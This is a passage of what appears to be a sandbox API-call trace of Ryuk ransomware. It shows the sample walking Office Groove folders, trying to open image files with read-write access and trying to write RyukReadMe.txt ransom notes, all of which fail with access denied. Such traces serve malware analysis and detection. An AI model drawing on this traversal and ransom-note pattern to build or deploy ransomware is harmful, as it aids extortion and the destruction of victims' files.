(hObject=0xffffffffffffffff) returned 0 [0136.920] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.921] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.921] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.921] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_MediumMAsk.bmp", dwFileAttributes=0x80) returned 0 [0136.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_MediumMAsk.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_mediummask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.921] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.921] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.921] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.921] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.921] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Off.jpg", dwFileAttributes=0x80) returned 0 [0136.921] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_Off.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_off.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.922] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.922] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.922] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.922] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.922] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_OffMask.bmp", dwFileAttributes=0x80) returned 0 [0136.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\AlertImage_OffMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\alertimage_offmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.923] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.923] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.923] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.923] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.923] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImage.jpg", dwFileAttributes=0x80) returned 0 [0136.923] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsincomingimage.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.923] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.923] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.923] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.924] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.924] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageMask.bmp", dwFileAttributes=0x80) returned 0 [0136.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagemask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.924] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.924] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.924] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.924] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.924] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageMaskSmall.bmp", dwFileAttributes=0x80) returned 0 [0136.924] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageMaskSmall.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagemasksmall.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.925] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.925] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.925] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.925] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.925] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageSmall.jpg", dwFileAttributes=0x80) returned 0 [0136.925] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsIncomingImageSmall.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsincomingimagesmall.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.925] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.925] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.925] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.925] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.925] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImage.jpg", dwFileAttributes=0x80) returned 0 [0136.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImage.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimage.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.926] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.926] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.926] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.926] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.926] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageMask.bmp", dwFileAttributes=0x80) returned 0 [0136.926] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagemask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.926] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.926] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.926] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.926] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.927] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageMaskSmall.bmp", dwFileAttributes=0x80) returned 0 [0136.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageMaskSmall.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagemasksmall.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.927] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.927] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.927] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.927] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.927] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageSmall.jpg", dwFileAttributes=0x80) returned 0 [0136.927] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\CommsOutgoingImageSmall.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\commsoutgoingimagesmall.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.927] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.928] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.928] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.928] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.928] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\MessageBoxIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.928] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\MessageBoxIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\messageboxiconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.928] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.928] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.928] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.928] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.928] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\MessageBoxIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.929] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\MessageBoxIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\messageboxiconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.929] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.929] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.929] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.929] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.929] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIcon.jpg", dwFileAttributes=0x80) returned 0 [0136.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\unreadicon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.930] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.930] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.930] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.930] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.930] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.930] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\unreadiconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.930] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.930] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.931] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.931] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.931] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.931] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\UnreadIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\unreadiconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.931] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.931] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.931] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.931] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.932] SetLastError (dwErrCode=0x0) [0136.932] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\CommonData\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\commondata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.934] GetLastError () returned 0x5 [0136.934] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.934] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.934] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.934] SetLastError (dwErrCode=0x0) [0136.935] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.935] GetLastError () returned 0x5 [0136.935] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.935] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.935] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.935] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.935] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.935] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.935] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericon.jpg", dwFileAttributes=0x80) returned 0 [0136.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\computericon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.937] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.937] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.937] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.937] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.937] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericonMask.bmp", dwFileAttributes=0x80) returned 0 [0136.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\computericonMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\computericonmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.937] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.937] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.938] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.938] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.938] SetLastError (dwErrCode=0x0) [0136.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Computers\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\computers\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.938] GetLastError () returned 0x5 [0136.938] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.938] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.938] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.938] SetLastError (dwErrCode=0x0) [0136.938] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.938] GetLastError () returned 0x5 [0136.938] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.938] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.938] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.938] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.938] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.938] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.939] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImages.jpg", dwFileAttributes=0x80) returned 0 [0136.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\discussion\\discussiontooliconimages.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.939] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.939] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.939] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.939] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.939] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImagesMask.bmp", dwFileAttributes=0x80) returned 0 [0136.939] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\DiscussionToolIconImagesMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\discussion\\discussiontooliconimagesmask.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.939] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.939] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.940] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0136.940] FindClose (in: hFindFile=0x3b4940 | out: hFindFile=0x3b4940) returned 1 [0136.940] SetLastError (dwErrCode=0x0) [0136.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\Discussion\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\discussion\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.940] GetLastError () returned 0x5 [0136.940] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.940] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.940] FindNextFileW (in: hFindFile=0x3bb540, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0136.940] SetLastError (dwErrCode=0x0) [0136.940] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.940] GetLastError () returned 0x5 [0136.940] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0) returned 0 [0136.940] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.940] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\DocumentShare\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3b4940 [0136.941] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.941] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) 